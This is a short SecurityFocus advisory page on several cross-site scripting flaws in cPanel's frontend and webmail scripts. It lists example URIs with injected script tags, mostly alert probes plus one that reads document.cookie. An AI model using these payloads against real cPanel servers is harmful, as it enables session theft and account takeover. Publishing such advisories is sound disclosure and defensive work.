Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

cPanel Multiple Cross-Site Scripting Vulnerabilities



No exploit is required.

Example URI have been provided:


http://www.example.com:2082/frontend/xcontroller/editquota.html?email=<script>alert('vul')</script>&domain=

http://www.example.com:2082/frontend/xcontroller/dodelpop.html?email=<script>alert('vul')</script>&domain=xxx

http://www.example.com:2082/frontend/xcontroller/diskusage.html?showtree=0"><script>alert('vul')</script>

http://www.example.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&year=2006&domain=xxx&target="><script>alert('vul')</script>

http://www.example.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&year=2006&domain=xxx"><script>alert('vul')</script>&target=xxx

http://www.example.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&year=2006"><script>alert('vul')</script>&domain=xxx&target=xxx

http://www.example.com:2095/webmailaging.cgi?numdays=%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E&ageaction=change







 

Privacy Statement
Copyright 2009, SecurityFocus